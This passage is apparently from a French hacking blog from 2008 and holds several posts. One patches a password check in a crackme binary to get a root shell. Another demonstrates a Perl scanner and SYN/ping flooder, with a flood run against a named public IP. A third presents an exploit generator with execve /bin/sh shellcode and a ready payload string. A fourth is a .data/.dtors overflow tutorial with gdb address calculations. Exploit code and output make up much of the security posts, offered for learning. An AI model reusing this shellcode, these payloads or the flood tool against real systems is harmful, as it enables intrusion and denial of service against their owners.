intéréssantes ( ici avec objdump) de cette maniere :<br /><br /><span style="color: rgb(255, 0, 0);">objdump -d Sysinfos </span><br /><br />et...bingo !<br /><br />Aprés avoir parcouru les lignes ,on se rend vite compte de la simplicité de la chose lorsqu'on tombe sur un JNE (Jump if Not Egal ) intéréssant.<br /><br /><span style="color: rgb(255, 0, 0);">...........................................</span><br /><span style="color: rgb(255, 0, 0);"> ...........................................><br /><br /></span><span style="color: rgb(255, 0, 0);"> 8048410: 55 push ebp</span><br /><span style="color: rgb(255, 0, 0);"> 8048411: 89 e5 mov esp,ebp</span><br /><span style="color: rgb(255, 0, 0);"> 8048413: 53 push ebx </span><br /><span style="color: rgb(255, 0, 0);"> 8048414: 83 ec 04 sub 0x4,esp</span><br /><span style="color: rgb(255, 0, 0);"> 8048417: 80 3d bc 98 04 08 00 cmpb 0x0,0x80498bc</span><br /><span style="color: rgb(255, 0, 0);"> 804841e: 75 40 jne 8048460 <__do_global_dtors_aux+0x50><br /><span style="color: rgb(204, 204, 204);">;saut au destructeur si valeur inégale<br /><br /></span></span><span style="color: rgb(255, 0, 0);"> <..........................................</span><br /><span style="color: rgb(255, 0, 0);"> ..........................................</span><br /><br /><br />Reste plus qu'a l'éditer a l'aider d'un éditeur hexadécimal pour en modifier la valeur sachant que l'on doit remplacer la valeur 75 par 74 .<br /><br />Nous avons jne = <span style="color: rgb(255, 0, 0);">75</span><br />Nous allons faire en sorte d'obtenir je = <span style="color: rgb(255, 0, 0);">74</span><br /><br />Editons donc a l'aide (par exemple ) de Ghex .<br /><br /><span style="color: rgb(255, 0, 0);">Ghex2 Sysinfos</span><br /><br />On va rechercher la valeur hexa <span style="color: rgb(255, 0, 0);">75 40</span> et hop , y'a plus qu'a modifier , enregistrer, faire un chmod +x Sysinfos et lancer le prog pour vérifier.<br /><br /><br /><span style="color: rgb(255, 0, 0);">[root@localhost kmkz]# ./Sysinfos2 i</span><br /><span style="color: rgb(255, 0, 0);">Vérification de votre mot de passe..</span><br /><span style="color: rgb(255, 0, 0);">'+) Authentification réussie... </span><br /><span style="color: rgb(255, 0, 0);"> U'r root! </span><br /><br /><span style="color: rgb(255, 0, 0);"> sh 3.0 #</span><br /><br /><br />Et voila , le Sysinfos est encore une fois bypasser et ce d'une façon des plus élémentaire mais c'était " just for fun " ;-) .<br /></span>kmkzhttp://www.blogger.com/profile/11354372095868320290noreply@blogger.com2tag:blogger.com,1999:blog-4457623080129847893.post-29663232140670229392008-10-22T15:47:00.000+02:002008-10-22T16:33:43.453+02:00Quand on ne sais que faire ... on code nawak (et ça se voit :-P )<span style="color: rgb(204, 204, 204);">o/ All ! </span><br /><br /><span style="color: rgb(204, 204, 204);">Bon bah tout est dans le titre :<br /><br />cette fois - ci ne sachant pas trop sur quoi bosser et , je doit l'avouer ,ayant envie de me remettre au Perl aprés tant de temp passé sur d'autre langages , je me suis mis a coder un petit tool ( incomplet mais bon c'est juste une "remise a niveau " :-P ) , histoire de me replonger dans les méandres de ce magnifique langage qu'est le Perl .</span><br /><br /><span style="color: rgb(204, 204, 204);">Comme dis ci-dessus , ici rien d'extraordinaire car il s'agissait surtout d'un "prétexte" pour revoir un peu le Perl .<br /><br /></span><span style="color: rgb(204, 204, 204);">Cependant , je compte réellement continuer a travaiiler dessus et ce , dans de vrais projets a venir , mais je n'en dirais pas plus .... ;-) </span><br /><br /><span style="color: rgb(51, 102, 255);">-----------------></span><br /><span style="color: rgb(204, 204, 204);">Bon , ce tool donc - (baptisé KM-Net-tool pour kmkz network tool ) - permet entre autre de scanner (super original je sais) des ports définis par l'utilisateur sous forme de "plage" a scanner ( Port de départ et d'arrivée) tout en choisissant aussi le Time-out et le protocole a utiliser .<br /><br /><br /></span><span style="color: rgb(204, 204, 204);">Il permet aussi la pratique du SYN flood en forgeant plus ou moins ses paquets :<br /><br />ip de départ , ip cible , port cible , taille du paquet ; ainsi que le classique et peu utile (mais toujours intéréssant ne serait-ce que pour ce qu'on y apprend ) ping flood , largement moins paramétrable (si peu utile...) : ip cible et protocole uniquement.</span><br /><br /><span style="color: rgb(204, 204, 204);">Voici une ptite démo de ce code basique mais toutefois bien intéréssant a coder , surtout pour se remettre dans le bain car , je le rappelle , c'est ici mon objectif , rien de plus .<br /><br /></span><span style="color: rgb(51, 102, 255);"><----------------- <span style="color: rgb(204, 204, 204);">Présentation :</span><br /><span style="color: rgb(255, 0, 0);">[root@ KM-Net-tool]# perl KM-Net-tool.pl</span><br /><br /><span style="color: rgb(255, 0, 0);">Usage KM-Net-tool.pl: [-f# -S# -p# -l] </span><br /><span style="color: rgb(255, 0, 0);"> </span><br /><span style="color: rgb(255, 0, 0);"> </span><span style="color: rgb(255, 0, 0);"></span><br /><span style="color: rgb(255, 0, 0);">-S (Scan) /host_to_test / \Time out\ /Port to Start/ \Port to Stop\ /Protocol/</span><br /><span style="color: rgb(255, 0, 0);">-f (SYN Flood) /Source-IP/ \Target_IP\ /Target_Port/ \Packet_size\</span><br /><span style="color: rgb(255, 0, 0);">-p (Ping Flood) /Target-IP/ \Protocol\</span><br /><span style="color: rgb(255, 0, 0);">-l (GNU Licence)</span><br /><br /><br /><span style="color: rgb(255, 0, 0);">-----------------------------------------------------------</span><br /><br /><span style="color: rgb(255, 0, 0);">Contact "kmkz" for more informations.</span><br /><span style="color: rgb(255, 0, 0);"> </span><br /><span style="color: rgb(255, 0, 0);"> Mail: kmkz[at]live[dot]fr.</span><br /><span style="color: rgb(255, 0, 0);"> WebSite: http://kmkz-web-blog.blogspot.com</span><br /><span style="color: rgb(255, 0, 0);"> Board: www.collective-utopia.no-ip.fr<br /><br /><br /></span></span><span style="color: rgb(51, 102, 255);">-----------------></span><br /><span style="color: rgb(51, 102, 255);"><span style="color: rgb(255, 0, 0);"></span><br /><span style="color: rgb(204, 204, 204);">Démo d'un scan (SUID Root utilisé par le module RawIP) :<span style="color: rgb(255, 0, 0);"><br /><br />[root@ KM-Net-tool]# perl KM-Net-tool.pl -S 213.251.1xx.xxx 1 1 200 tcp</span><br /><br /><span style="color: rgb(255, 0, 0);">[+]Checking modules....</span><br /><br /><span style="color: rgb(255, 0, 0);"> [ Module IO::Socket::INET : OK ]</span><br /><span style="color: rgb(255, 0, 0);"> [ Module Net::Ping : OK ]</span><br /><span style="color: rgb(255, 0, 0);"> [ Module Net::RawIP : OK ]</span><br /><span style="color: rgb(255, 0, 0);"> [ Module Getopt::Std : OK ]</span><br /><br /><span style="color: rgb(255, 0, 0);"> ---------------------------------------------------------</span><br /><br /><span style="color: rgb(255, 0, 0);"> ~ PING 213.251.1xx.xxx .... + Ok!</span><br /><br /><span style="color: rgb(255, 0, 0);"> ~ Localtime: Wed Oct 22 16:02:18 2008</span><br /><span style="color: rgb(255, 0, 0);"> [+] Time out : 1</span><br /><span style="color: rgb(255, 0, 0);"> [+] Starting scan port n° 1 </span><br /><span style="color: rgb(255, 0, 0);"> [+] Finish scan port n° 200</span><br /><span style="color: rgb(255, 0, 0);"> [+] Protocol Selected : tcp</span><br /><br /><span style="color: rgb(255, 0, 0);"> ---------------------------------------------------------</span><br /><br /><span style="color: rgb(255, 0, 0);">(+) Starting Scan (using Thread) : </span><br /><br /><span style="color: rgb(255, 0, 0);"> [+] Port 21 - tcp Open</span><br /><span style="color: rgb(255, 0, 0);"> [+] Port 22 - tcp Open</span><br /><span style="color: rgb(255, 0, 0);"> [+] Port 25 - tcp Open</span><br /><span style="color: rgb(255, 0, 0);"> [+] Port 53 - tcp Open</span><br /><span style="color: rgb(255, 0, 0);"> [+] Port 80 - tcp Open</span><br /><span style="color: rgb(255, 0, 0);"> [+] Port 110 - tcp Open</span><br /><span style="color: rgb(255, 0, 0);"> [+] Port 143 - tcp Open</span><br /><br /><br /><br />Rien de bien sorcier en soit ...autre exemple : un SYN flood :<br /><br /><span style="color: rgb(255, 0, 0);">[root@ KM-Net-tool]# perl KM-Net-tool.pl -f 84.56.82.98 213.251.178.117 22 4000 </span><br /><br /><span style="color: rgb(255, 0, 0);">[+]Checking modules....</span><br /><br /><span style="color: rgb(255, 0, 0);"> [ Module IO::Socket::INET : OK ]</span><br /><span style="color: rgb(255, 0, 0);"> [ Module Net::Ping : OK ]</span><br /><span style="color: rgb(255, 0, 0);"> [ Module Net::RawIP : OK ]</span><br /><span style="color: rgb(255, 0, 0);"> [ Module Getopt::Std : OK ]</span><br /><br /><span style="color: rgb(255, 0, 0);"> ---------------------------------------------------------</span><br /><br /><span style="color: rgb(255, 0, 0);">+1 +1 +1 +1 +1 +1 +1 +1 +1 +1 +1 +1 +1 +1 ...... </span><br /><br />Ou chaque "+1" signifie qu'un paquet a été envoyé a la cible .<br /><br />Bon on va stopper la car je pense que vous avez compris comment ce tool trés simple d'usage fonctionne , si ce n'est pas le cas , a vous de consulter l'aide fournie avec .<br /><br />A bientot pour de VRAIS projet en Perl ;-) c'est promis !<br /><br /></span></span><span style="color: rgb(51, 102, 255);"> <------------------------- ><br /><br /><a href="http://membres.lycos.fr/profil4/tools/KM-Net-tool.tar">Archive du projet KM-Net-tool</a><br /><br /></span><span style="color: rgb(51, 102, 255);"> <-------------------------></span><span style="color: rgb(51, 102, 255);"><br /></span>kmkzhttp://www.blogger.com/profile/11354372095868320290noreply@blogger.com5tag:blogger.com,1999:blog-4457623080129847893.post-32988580702039330872008-09-08T17:18:00.000+02:002008-09-08T17:27:10.227+02:00Résumer du premier 2600 Nîmois<span style="color: rgb(204, 204, 204);">Salut a tous ! </span><br /><span style="color: rgb(204, 204, 204);">Et bien voila , le premier meet' a bien eu lieu sur Nîmes .</span><br /><br /><span style="color: rgb(204, 204, 204);">Le résumé ce trouve dispo sur le forum 2600fr.org a cette adresse : </span><br /><a href="http://www.2600fr.org/forum/viewtopic.php?id=154">résumer 2600 Nîmes</a><br /><br /><span style="color: rgb(204, 204, 204);">Ce qu'on peu en dire en 2 mots c'est que ce fut un agréable moment intéréssant et riche en partage .</span><br /><span style="color: rgb(204, 204, 204);">Nous nous sommes posé dans le "Cyber-Restaurant " le " Net m'Eating " , ou nous avons pu bidouiller un peu le tout en étant bien confortablement installé ( voir résumé pour plus d'infos).</span><br /><a href="http://www.restaurant-netmeating.com/">net m' eating</a><br /><br /><span style="color: rgb(204, 204, 204);">J'espere tout de meme y voir un peu plus de monde dans les mois a venir mais chaque choses en son temp .</span><br /><br /><span style="color: rgb(204, 204, 204);">Si certain sont intéréssés , n'hésitez pas a me contacter pour avoir plus d'infos .</span><br /><br /><span style="color: rgb(204, 204, 204);">merci a tous .</span>kmkzhttp://www.blogger.com/profile/11354372095868320290noreply@blogger.com2tag:blogger.com,1999:blog-4457623080129847893.post-69187035037839476672008-08-23T18:43:00.000+02:002008-09-01T22:24:35.619+02:00.Data Overflow et utilisation de "DBOEE" pour générer l'exploit approprié et exploiter<span style="color: rgb(204, 204, 204);">Salut a tous et a toutes .</span><br /><span style="color: rgb(204, 204, 204);">Dans ce nouveau billet , je compte vous présenter mon projet baptisé "DBOEE" (Data-Based-Overflow Easy Exploitation) dans sa version "beta" si on peu dire .</span><br /><br /><span style="color: rgb(204, 204, 204);">Mais en quoi cela consiste -il ?</span><br /><span style="color: rgb(204, 204, 204);"> </span><br /><span style="color: rgb(204, 204, 204);">En fait , ce billet sera ici un complément du précédent concernant les .Data Overflows .</span><br /><span style="color: rgb(204, 204, 204);">Le précédent billet m'a valut un commentaire de la part de quelqu'un ( il se reconnaitra j'espere ;-)) que j'admire me demandant "pourquoi tu n'as pas coder l'exploit qui va avec ?" .</span><br /><br /><span style="color: rgb(204, 204, 204);">Cette question a pour réponse : pas envie de coder un exploit pour un vuln.c ( pas trés utile en soit) .<br /><br /></span><span style="color: rgb(204, 204, 204);">Mais en y réfléchissant , pourquoi ne pas coder un programme qui , non seulement serait un exploit pour ce vuln.c, mais aussi serait adaptable a d'autres .Data Overflow ?</span><br /><br /><br /><span style="color: rgb(204, 204, 204);">De la est né le projet DBOEE ayant pour objectif ( dans la version beta tout du moins ) ,la possibilité de s'adapter a d'autre situations afin de pouvoir facilement exploiter et au passage générer l'exploit associé .</span><br /><span style="color: rgb(204, 204, 204);"></span><br /><span style="color: rgb(204, 204, 204);">Concrètement DBOEE vous demandera un shellcode (fournis au cas ou ..) , le nombre d'octets entre le buffer et la section DTORS a écraser ( j'automatiserais ça par la suite ) ainsi que la cible .</span><br /><br /><span style="color: rgb(204, 204, 204);">Concernant le nombre d'octets , le programme le calcule en déduisant la taille du shellcode de façon a faciliter cette opération .</span><br /><span style="color: rgb(204, 204, 204);">Une fois l'exploit créé , il est sauvergardé dans le fichier Exploit.txt puis exploite le programme vulnérable.</span><br /><br /><span style="color: rgb(204, 204, 204);">Voila pour la présentation du projet DBOEE qui n'en ait ici qu'a ses débuts ( voir readme joint a l'archive).</span><br /><span style="color: rgb(204, 204, 204);">Place au test :</span><br /><span style="color: rgb(255, 0, 0);">[kmkz@localhost Fuzzer_Data-overflow]$ ./DBOEE</span><br /><br /><br /><span style="color: rgb(255, 0, 0);">----------------------------</span><br /><span style="color: rgb(255, 0, 0);"> - Data-Based-Overflow Easy Exploitation - </span><br /><span style="color: rgb(255, 0, 0);">----------------------------</span><br /><br /><br /><span style="color: rgb(255, 0, 0);">[+]Programm :</span><br /><span style="color: rgb(255, 0, 0);">-Devellopped by kmkz(c)</span><br /><span style="color: rgb(255, 0, 0);">-Compilation :gcc -o DBOEE DBOEE.c </span><br /><br /><span style="color: rgb(255, 0, 0);"> [+]Author's informations :</span><br /><span style="color: rgb(255, 0, 0);"> kmkz's web sites -> http://kmkz-web-blog.blogspot.com & www.collective-utopia.no-ip.fr</span><br /><br /><span style="color: rgb(255, 0, 0);">[+]This programm has been coded for makes easier the Data based Overflow exploitation.</span><br /><span style="color: rgb(255, 0, 0);"> You just have to give a shellcode(reached) , numbers of Bytes and the target name . DBOEE calculate the payload, exploit program and create feat ,nice isn't it.?</span><br /><br /><span style="color: rgb(255, 0, 0);">[~]This is my first real projet in C language and Beta version also I hold has excuse me for essential lack </span><br /><br /><br /><span style="color: rgb(255, 0, 0);"> ---------------------------****************--------------------------- </span><br /><br /><br /><span style="color: rgb(255, 0, 0);"> ---------------------------STARTING PROGRAM--------------------------- </span><br /><br /><br /><span style="color: rgb(255, 0, 0);">[*] Enter Adress Return :</span><br /><span style="color: rgb(102, 204, 204);"> "\x60\x95\x04\x08"</span><br /><br /><span style="color: rgb(255, 0, 0);">[*] Enter your shellcode :</span><br /><span style="color: rgb(102, 204, 204);"> "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\x<br />cd\x80"</span><br /><br /><span style="color: rgb(255, 0, 0);"> ---------------------------Starting Exploitation--------------------------- </span><br /><br /><span style="color: rgb(255, 0, 0);">[~]Program Running......</span><br /><br /><span style="color: rgb(255, 0, 0);"> [~] check on the ongoing shellcode...</span><br /><span style="color: rgb(255, 0, 0);">- Shellcode maximum Size : 1000</span><br /><span style="color: rgb(255, 0, 0);">- Shellcode character -> 73 </span><br /><span style="color: rgb(255, 0, 0);">- Shellcode size (octets) -> 18 </span><br /><br /><br /><span style="color: rgb(255, 0, 0);"> ---------------------------Shellcode Created--------------------------- </span><br /><br /><br /><span style="color: rgb(255, 0, 0);">[*] enter the number of 'A' (octets) necessary for Overflow exploitation :</span><br /><span style="color: rgb(102, 204, 204);"> 272</span><br /><br /><span style="color: rgb(255, 0, 0);"> ---------------------------Shellcode Created--------------------------- </span><br /><br /><span style="color: rgb(255, 0, 0);">[~]Generating Payload....</span><br /><br /><span style="color: rgb(255, 0, 0);">(+)[Your Payload is] --> </span><br /><span style="color: rgb(255, 0, 0);"> 272 x 'A' [your shellcode] </span><br /><br /><span style="color: rgb(255, 0, 0);">(+) subtraction of the shellcode bytes ...</span><br /><br /><span style="color: rgb(255, 0, 0);"> [*] Payload generated is : printf 254 x 'A' [shellcode]</span><br /><br /><br /><span style="color: rgb(255, 0, 0);"> ---------------------------Payload Created--------------------------- </span><br /><br /><span style="color: rgb(255, 0, 0);"> [~] Give me a target (example-> ./vuln)</span><br /><span style="color: rgb(102, 204, 204);">./vuvu</span><br /><span style="color: rgb(255, 0, 0);">-Target programm is -> ./vuvu</span><br /><br /><span style="color: rgb(255, 0, 0);"> ---------------------------Generating Exploit File--------------------------- </span><br /><br /><span style="color: rgb(255, 0, 0);">[#] Creating Exploit File ....</span><br /><br /><span style="color: rgb(255, 0, 0);">[#]Exploit.txt : success ! </span><br /><br /><br /><span style="color: rgb(255, 0, 0);">[+] Sending payload...</span><br /><br /><span style="color: rgb(255, 0, 0);"> ------------ Result ------------ </span><br /><span style="color: rgb(255, 0, 0);">sh-3.2$ </span><span style="color: rgb(255, 0, 0);"></span><br /><br /><span style="color: rgb(204, 204, 204);">-----------------------------------------------------------------------------------------------------------------------------------------------------------</span><br /><span style="color: rgb(204, 204, 204);"> -Contenu du Fichier Exploit.txt -</span><br /><span style="color: rgb(204, 204, 204);">-----------------------------------------------------------------------------------------------------------------------------------------------------------</span><br /><span style="color: rgb(255, 153, 0);">`printf "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\x<br />cd\x80"``perl -e 'print "A"x254'``printf "\x60\x95\x04\x08"</span><span style="color: rgb(255, 153, 0);">`</span><br /><span style="color: rgb(204, 204, 204);">-----------------------------------------------------------------------------------------------------------------------------------------------------------</span><br /><br /><span style="color: rgb(204, 204, 204);">Comme on peu le constater , l'exploit généré correspond en tout points a celui obtenu lors du billet précédent.<br /><br /></span><span style="color: rgb(204, 204, 204);">-----</span><br /><a href="http://membres.lycos.fr/profil4/tools/DBOEE-project.tar.gz">Archive du projet DBOEE</a><br /><span style="color: rgb(204, 204, 204);">-----</span><span style="color: rgb(204, 204, 204);"><br /><br /></span><span style="color: rgb(204, 204, 204);">Voila , le source est un peu (beaucoup ) plus présentable désormais grace a la participation de m_101 (que je remercie au passage ).</span><br /><span style="color: rgb(204, 204, 204);">Pour plus d'infos , consulter le "readme" inclu a l'archive.</span><br /><span style="color: rgb(204, 204, 204);">A trés bientot et merci a tous \o !<br /><br />ps2: Retrouver l'appel a participation au projet sur le forum<br /><br /><a href="http://www.collective-utopia.no-ip.fr/">Collective-Utopia</a><br /></span>kmkzhttp://www.blogger.com/profile/11354372095868320290noreply@blogger.com1tag:blogger.com,1999:blog-4457623080129847893.post-79603793296139693812008-08-09T12:38:00.000+02:002008-08-30T14:30:13.585+02:00.Data Section overflow<span style="color: rgb(204, 204, 204);">Hello World ! </span><br /><span style="color: rgb(204, 204, 204);">Me revoila pour un petit billet (probablement un des derniers de l'été /o\ mais pas le dernier de ce blog , loin de la ;-) ! </span><br /><span style="color: rgb(204, 204, 204);">Alors , étant un peu a court d'idées mais ayant besoin de travailler sur quelque chose d'assez concret/intéréssant , je me suis dis "pourquoi pas un article sur les Data overflow?" .<br />Cet article montrera uniqueme les notions de bases qui seront approfondie par la suite dans d'autres articles a venir .<br /> <span style="color: rgb(51, 51, 255);"> |------------ Environnement</span></span><span style="color: rgb(51, 51, 255);"> -----------|<br /><span style="color: rgb(204, 204, 204);"> Il reste inchangé , cependant il est bon de le rappeller :<br /></span></span><span style="color: rgb(255, 0, 0);">Linux Free 2.6.22.19-desktop-2mdv 2008 </span><span style="color: rgb(255, 0, 0);">- GNU/Linux</span><br /><span style="color: rgb(255, 0, 0);">i686 Intel(R) Pentium(R) 4 CPU 2.93GHz<br /></span><span style="color: rgb(204, 204, 204);"><span style="color: rgb(51, 51, 255);"> |------------ Environnement</span></span><span style="color: rgb(51, 51, 255);"> -----------|</span><br /><span style="color: rgb(51, 102, 255);"></span><br /><span style="color: rgb(204, 204, 204);">Les Data Overflow sont donc des Buffers Overflow se situants donc dans la section .Data (logique ,non..?) .</span><br /><br /><span style="color: rgb(204, 204, 204);">Contrairement aux Stack Overflow , nous n'allons pas chercher a "écraser" la pile mais bel et bien une autre Section mémoire .</span><br /><br /><span style="color: rgb(204, 204, 204);">Commençons la pratique :</span><br /><br /><span style="color: rgb(204, 204, 204);">Tout d'abord regardons l'organisation des sections de notre programme vulnérable (fourni en fin d'article) :</span><br /><br /><span style="color: rgb(255, 0, 0);">[kmkz@localhost Data_overflow]$ size -A -x vuvu </span> <span style="color: rgb(204, 204, 204);">// Simpa le nom </span><br /><span style="color: rgb(255, 0, 0);">bss2 :</span><br /><span style="color: rgb(255, 0, 0);">section size addr</span><br /><span style="color: rgb(255, 0, 0);">.interp 0x13 0x8048114</span><br /><span style="color: rgb(255, 0, 0);">.note.ABI-tag 0x20 0x8048128</span><br /><span style="color: rgb(255, 0, 0);">.gnu.hash 0x20 0x8048148</span><br /><span style="color: rgb(255, 0, 0);">.dynsym 0x50 0x8048168</span><br /><span style="color: rgb(255, 0, 0);">.dynstr 0x4c 0x80481b8</span><br /><span style="color: rgb(255, 0, 0);">.gnu.version 0xa 0x8048204</span><br /><span style="color: rgb(255, 0, 0);">.gnu.version_r 0x20 0x8048210</span><br /><span style="color: rgb(255, 0, 0);">.rel.dyn 0x8 0x8048230</span><br /><span style="color: rgb(255, 0, 0);">.rel.plt 0x18 0x8048238</span><br /><span style="color: rgb(255, 0, 0);">.init 0x30 0x8048250</span><br /><span style="color: rgb(255, 0, 0);">.plt 0x40 0x8048280</span><br /><span style="color: rgb(255, 0, 0);">.text 0x15c 0x80482c0</span><br /><span style="color: rgb(255, 0, 0);">.fini 0x1c 0x804841c</span><br /><span style="color: rgb(255, 0, 0);">.rodata 0x8 0x8048438 </span><br /><span style="color: rgb(255, 0, 0);">.eh_frame 0x4 0x8048440</span><br /><br /><span style="color: rgb(255, 0, 0);">.ctors 0x8 0x8049444 </span> <span style="color: rgb(204, 204, 204);">---> constructor </span><br /><span style="color: rgb(255, 0, 0);">.dtors 0x8 0x804944c</span> <span style="color: rgb(204, 204, 204);">---> destructor</span><br /><br />.<span style="color: rgb(255, 0, 0);">jcr 0x4 0x8049454</span><br /><span style="color: rgb(255, 0, 0);">.dynamic 0xc8 0x8049458</span><br /><span style="color: rgb(255, 0, 0);">.got 0x4 0x8049520</span><br /><span style="color: rgb(255, 0, 0);">.got.plt 0x18 0x8049524</span><br /><br /><span style="color: rgb(255, 0, 0);">.data 0x120 0x8049540</span> <span style="color: rgb(204, 204, 204);">---> Section .Data contenant le buffer vulnérable</span><br /><br /><span style="color: rgb(255, 0, 0);">.bss 0x4 0x8049660</span><br /><span style="color: rgb(255, 0, 0);">.comment 0x177 0x0</span><br /><span style="color: rgb(255, 0, 0);">.debug_aranges 0x50 0x0</span><br /><span style="color: rgb(255, 0, 0);">.debug_pubnames 0x25 0x0</span><br /><span style="color: rgb(255, 0, 0);">.debug_info 0x1cd 0x0</span><br /><span style="color: rgb(255, 0, 0);">.debug_abbrev 0x6f 0x0</span><br /><span style="color: rgb(255, 0, 0);">.debug_line 0x147 0x0</span><br /><span style="color: rgb(255, 0, 0);">.debug_str 0xcf 0x0</span><br /><span style="color: rgb(255, 0, 0);">.debug_ranges 0x40 0x0</span><br /><span style="color: rgb(255, 0, 0);">Total 0xbc7<br /><br /><span style="color: rgb(204, 204, 204);">Vous remarquez 2 sections appellées Dtors et Ctors ( Constructor & Destructor).<br />Il s'agit de 2 sections présentes dans un fichier de format ELF qui sont deux attributs du<br />compilateurs gcc.<br />Elles permettent l’exécution de fonctions avant l’appel à la fonction<br />main() et avant le dernier exit() du programme .<br />( c'est a dire qu'elle le construisent et le détruisent a la fin ).<br /><br />Ainsi, en faisant déborder le buffer vulnérable de la section .data nous<br />arrivons à écrire dans la section .dtors et à exécuter du code à la sortie de notre<br />programme.<br /><br /><span style="color: rgb(51, 102, 255);">----------------------------------></span><br />Organisation des Ctors et Dtors:<br /><br /><span style="color: rgb(255, 0, 0);">0xffffffff <adresse> <adresse> . . . 0x00000000</adresse></adresse></span><br /></span></span><span style="color: rgb(255, 0, 0);"><span style="color: rgb(204, 204, 204);"><span style="color: rgb(51, 102, 255);"><----------------------------------</span><br />Meme lorsque ces 2 fonctions se trouvent etre vides , elle sont tout de meme présentes en mémoire .<br /><br />Dans vuvu.c , la section .dtors est justement vide :<br /><br /></span></span><span style="color: rgb(255, 0, 0);"><span style="color: rgb(204, 204, 204);"><span style="color: rgb(51, 102, 255);">----------------------------------></span></span></span><br /><span style="color: rgb(255, 0, 0);"><span style="color: rgb(204, 204, 204);"><br /><span style="color: rgb(255, 0, 0);">[kmkz@localhost </span></span></span><span style="color: rgb(255, 0, 0);">Data</span><span style="color: rgb(255, 0, 0);"><span style="color: rgb(204, 204, 204);"><span style="color: rgb(255, 0, 0);">_overflow]$ objdump -s -j .dtors vuvu</span><br /><br /><span style="color: rgb(255, 0, 0);">bss2: file format elf32-i386</span><br /><br /><span style="color: rgb(255, 0, 0);">Contents of section .dtors:</span><br /><span style="color: rgb(255, 0, 0);"> 804944c ffffffff 00000000 </span><br /></span></span><span style="color: rgb(255, 0, 0);"><span style="color: rgb(204, 204, 204);"><span style="color: rgb(51, 102, 255);"><---------------------------------- <span style="color: rgb(204, 204, 204);">Prenons maintenant les renseignement qui seront nécéssaire a la réalisation de ce petit exploit :<br /><br /></span></span></span></span><span style="color: rgb(255, 0, 0);"><span style="color: rgb(204, 204, 204);"><span style="color: rgb(51, 102, 255);">----------------------------------><br /><br /></span></span></span><br /><span style="color: rgb(255, 0, 0);">(gdb) disas main</span><br /><span style="color: rgb(255, 0, 0);">Dump of assembler code for function main:</span><br /><span style="color: rgb(255, 0, 0);">0x08048344 <main+0>: lea 0x4(%esp),%ecx</main+0></span><br /><span style="color: rgb(255, 0, 0);">0x08048348 <main+4>: and $0xfffffff0,%esp</main+4></span><br /><span style="color: rgb(255, 0, 0);">0x0804834b <main+7>: pushl 0xfffffffc(%ecx)</main+7></span><br /><span style="color: rgb(255, 0, 0);">0x0804834e <main+10>: push %ebp</main+10></span><br /><span style="color: rgb(255, 0, 0);">0x0804834f <main+11>: mov %esp,%ebp</main+11></span><br /><span style="color: rgb(255, 0, 0);">0x08048351 <main+13>: push %ecx</main+13></span><br /><span style="color: rgb(255, 0, 0);">0x08048352 <main+14>: sub $0x14,%esp</main+14></span><br /><span style="color: rgb(255, 0, 0);">0x08048355 <main+17>: mov 0x4(%ecx),%eax</main+17></span><br /><span style="color: rgb(255, 0, 0);">0x08048358 <main+20>: add $0x4,%eax</main+20></span><br /><span style="color: rgb(255, 0, 0);">0x0804835b <main+23>: mov (%eax),%eax</main+23></span><br /><span style="color: rgb(255, 0, 0);">0x0804835d <main+25>: mov %eax,0x4(%esp)</main+25></span><br /><span style="color: rgb(255, 0, 0);">0x08048361 <main+29>: movl $0x8049560,(%esp)</main+29></span><br /><span style="color: rgb(255, 0, 0);">0x08048368 <main+36>: call 0x80482b0 <strcpy@plt></strcpy@plt></main+36></span><br /><span style="color: rgb(255, 0, 0);">0x0804836d <main+41>: add $0x14,%esp</main+41></span><br /><span style="color: rgb(255, 0, 0);">0x08048370 <main+44>: pop %ecx</main+44></span><br /><span style="color: rgb(255, 0, 0);">0x08048371 <main+45>: pop %ebp</main+45></span><br /><span style="color: rgb(255, 0, 0);">0x08048372 <main+46>: lea 0xfffffffc(%ecx),%esp</main+46></span><br /><span style="color: rgb(255, 0, 0);">0x08048375 <main+49>: ret </main+49></span><br /><span style="color: rgb(255, 0, 0);">End of assembler dump.</span><br /><br /><span style="color: rgb(51, 102, 255);">---------------------------</span><br /><span style="color: rgb(204, 204, 204);">Adresse de notre buffer :</span><br /><span style="color: rgb(255, 0, 0);">(gdb) p & buf</span><br /><span style="color: rgb(255, 0, 0);">$1 = (<data> *)</data></span> <span style="color: rgb(255, 102, 0);">0x8049560</span><br /><br /><span style="color: rgb(51, 102, 255);">--------------------------</span><br /><span style="color: rgb(204, 204, 204);">Adresse de la section Dtors:</span><br /><br /><span style="color: rgb(255, 0, 0);">(gdb) mai i section</span><br /><span style="color: rgb(255, 0, 0);">Exec file:</span><br /><span style="color: rgb(255, 0, 0);"> `/home/kmkz/Bureau/C/TRAVAUX_hacking/Data_overflow/vuvu', </span><br /><span style="color: rgb(255, 0, 0);"> file type elf32-i386.</span><br /><br /><span style="color: rgb(255, 0, 0);">.....</span><br /><span style="color: rgb(255, 0, 0);">0x08049444->0x0804944c at 0x00000444: .ctors ALLOC LOAD DATA HAS_CONTENTS</span><br /><span style="color: rgb(255, 102, 0);">0x0804944c</span><span style="color: rgb(255, 0, 0);">->0x08049454 at 0x0000044c: .dtors ALLOC LOAD DATA HAS_CONTENTS</span><br /><span style="color: rgb(255, 0, 0);">.....</span><br /><span style="color: rgb(255, 0, 0);">0x08049660->0x08049664 at 0x00000660: .bss ALLOC</span><br /><span style="color: rgb(255, 0, 0);">.....</span><br /><br /><span style="color: rgb(51, 102, 255);">-------------------------</span><br /><br /><span style="color: rgb(255, 0, 0);">(gdb) x/2 0x0804944c</span><br /><span style="color: rgb(255, 0, 0);">0x804944c <__dtor_list__>: 0xffffffff 0x00000000</span><br /><br /><span style="color: rgb(204, 204, 204);">Ça rappelle pas un truc ça ...?</span><br /><span style="color: rgb(204, 204, 204);">Revoila notre Section Dtors bien vide comme vu précédemment.</span><br /><span style="color: rgb(51, 102, 255);">-------------------------</span><br /><br /><span style="color: rgb(255, 0, 0);">(gdb) p (0x804944c+4) - 0x8049560</span><br /><span style="color: rgb(255, 0, 0);">$2 = <span style="color: rgb(255, 102, 0);">272</span></span><br /><span style="color: rgb(255, 0, 0);"><span style="color: rgb(204, 204, 204);"><span style="color: rgb(51, 102, 255);"><----------------------------------</span></span></span><br /><span style="color: rgb(204, 204, 204);">Nous avons donc nombre d’octets</span><br /><span style="color: rgb(204, 204, 204);">depuis notre buffer jusqu’à l’adresse en DTORS à écraser. Nous avons donc toutes 